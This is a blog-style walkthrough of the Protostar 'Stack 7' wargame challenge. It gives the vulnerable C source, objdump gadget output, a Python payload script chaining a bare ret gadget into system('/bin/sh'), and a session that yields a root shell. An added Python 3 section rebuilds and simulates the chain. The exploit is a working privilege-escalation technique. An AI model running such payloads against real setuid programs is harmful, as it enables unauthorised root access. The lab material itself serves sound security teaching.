Tuesday, December 18, 2012

exploit-exercises Protostar: Stack 7

In this article we tackle Stack 7, the last Stack challenge of Exploit-Exercises' Protostar wargame. The source code of the vulnerable program is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
    char buffer[64];
    unsigned int ret;
    printf("input path please: "); fflush(stdout);
    gets(buffer);                        /* no length check: this is the overflow */
    ret = __builtin_return_address(0);   /* saved return address of getpath() */
    if((ret & 0xb0000000) == 0xb0000000) /* rejects libc (0xb7......) and stack (0xbf......) */
    {
        printf("bzzzt (%p)\n", ret);
        _exit(1);
    }
    printf("got path %s\n", buffer);
    return strdup(buffer);
}

int main(int argc, char **argv)
{
    getpath();
}
Like the previous challenge, there is a restriction on the return address, but this time the check is ((ret & 0xb0000000) == 0xb0000000). Both libc (0xb7......) and the stack (0xbf......) satisfy that mask, so returning straight into a library function like system(), or into shellcode sitting in the buffer, gets us a bzzzt; only addresses inside the binary itself (0x0804....) pass. The key point is that the check is applied to the first return address only, the one getpath() itself returns to. That makes a ROP-like exploit with a single gadget possible: a bare ret somewhere in the binary. getpath() returns to the gadget, the check passes, and the gadget's own ret pops the next word off the stack and jumps to it with no check at all. From there we chain the same payload we used before.
user@protostar:~/stack7$ objdump -d /opt/protostar/bin/stack7 | grep ret
 8048383:       c3                      ret
 8048494:       c3                      ret
 80484c2:       c3                      ret
 8048544:       c3                      ret
 8048553:       c3                      ret
 8048564:       c3                      ret
 80485c9:       c3                      ret
 80485cd:       c3                      ret
 80485f9:       c3                      ret
 8048617:       c3                      ret
We will be using one of those tiny gadgets, the ret at 0x8048617, and adapt the exploit from the previous challenge. The script below generates the payload; its output is saved to payload1 and piped into the binary, with a trailing cat to keep stdin open for the shell.
user@protostar:~/stack7$ cat shell7.py
#!/usr/bin/env python
# Python 2: print writes the raw bytes and appends the newline that terminates gets()

offset = 0x50                    # bytes from the start of buffer to the saved return address
cmd = "/bin/sh;#"                # placed at the start of buffer; ";#" makes sh ignore the filler
junk = "J" * (offset - len(cmd))
gadg_ret = "\x17\x86\x04\x08"    # 0x08048617: bare ret inside the binary, passes the check
ret1 = "\xb0\xff\xec\xb7"        # popped by the gadget's ret with no check: system() in libc
ret2 = "\xc0\x60\xec\xb7"        # return address for system(), as in the Stack 6 exploit
arg1 = "\x6c\xf7\xff\xbf"        # first argument to system(): address of buffer ("/bin/sh;#")
arg2 = "\xf0\xf1\xff\xff"        # argument for the function ret2 points at

payload = cmd + junk + gadg_ret + ret1 + ret2 + arg1 + arg2

print payload
user@protostar:~/stack7$ (cat payload1; cat) | /opt/protostar/bin/stack7
input path please: got path /bin/sh;#JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ �JJJJJJJJJJJJ ������`��l�������
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
whoami
root
exit
And that is it! Of course there are many other variations; one would be returning to our own shellcode, as in Stack 5, instead of returning to the system() library call.
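To make the mechanism concrete, here is an added example (my own code, not part of the original post or of the Protostar challenge) that models the getpath() check and replays what the CPU does with the words that overwrite the saved return address. It reuses the addresses from the walkthrough above (ret gadget, ret1, ret2, arg1, arg2, offset 0x50), packs the chain with struct instead of hand-written byte strings, and shows that only the first popped word is subject to the mask: with the bare ret in front, the unchecked second word can be system() in libc, while putting system() first is rejected. It is Python 3, so the payload is written as bytes.

```python
#!/usr/bin/env python3
# Added example (not from the original post): model the Stack 7 check and the one-gadget chain.
import struct
import sys

MASK = 0xb0000000   # from getpath(): if ((ret & 0xb0000000) == 0xb0000000) _exit(1)

# Addresses taken from the walkthrough above (Protostar VM, no ASLR).
RET_GADGET = 0x08048617   # lone `ret` in /opt/protostar/bin/stack7
SYSTEM     = 0xb7ecffb0   # ret1 in shell7.py: system() in libc
RET2       = 0xb7ec60c0   # ret2 in shell7.py: where system() returns to
BUF_ADDR   = 0xbffff76c   # arg1 in shell7.py: address of buffer, holding "/bin/sh;#"
ARG2       = 0xfffff1f0   # arg2 in shell7.py
OFFSET     = 0x50         # bytes from the start of buffer to the saved return address


def blocked(addr):
    """True if getpath() would print bzzzt and _exit(1) for this return address."""
    return (addr & MASK) == MASK


def p32(value):
    """Pack a 32-bit value little-endian, as it has to sit in memory on x86."""
    return struct.pack("<I", value & 0xffffffff)


def build_chain(offset, first_ret, words, cmd=b"/bin/sh;#", filler=b"J"):
    """Build the line fed to gets(): the command at the start of buffer, filler up to
    the saved return address, the (checked) return address, then the unchecked words."""
    if len(cmd) > offset:
        raise ValueError("command does not fit before the return address")
    payload = cmd + filler * (offset - len(cmd)) + p32(first_ret)
    return payload + b"".join(p32(w) for w in words)


def simulate(payload, offset, ret_gadgets):
    """Replay what the CPU does with the words that overwrite the saved return address.

    Word 0 is popped by getpath()'s own ret and is the only value the check sees.
    If it is a bare ret gadget, that gadget pops word 1 into eip with no check at all;
    word 2 then serves as the return address of the function at word 1, and the
    remaining words are its arguments (cdecl: first argument right above the return address).
    """
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(offset, len(payload) - 3, 4)]
    first = words[0]
    result = {"first_return": first, "passes_check": not blocked(first),
              "target": None, "target_return": None, "args": []}
    if blocked(first) or first not in ret_gadgets:
        return result   # either bzzzt, or eip lands somewhere this model does not follow
    result["target"] = words[1]
    result["target_return"] = words[2] if len(words) > 2 else None
    result["args"] = words[3:]
    return result


if __name__ == "__main__":
    # Same chain as shell7.py; the trailing newline terminates gets().
    # Usage: python3 this.py > payload1; (cat payload1; cat) | /opt/protostar/bin/stack7
    chain = build_chain(OFFSET, RET_GADGET, [SYSTEM, RET2, BUF_ADDR, ARG2])
    sys.stdout.buffer.write(chain + b"\n")
```

The simulation deliberately stops after the gadget's second ret: what happens inside system() depends on libc, not on the stack layout we control. The one thing worth internalising is the shape of the frame once the gadget has run, which is exactly the frame a direct return into system() would have needed in Stack 6, shifted down by one word.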
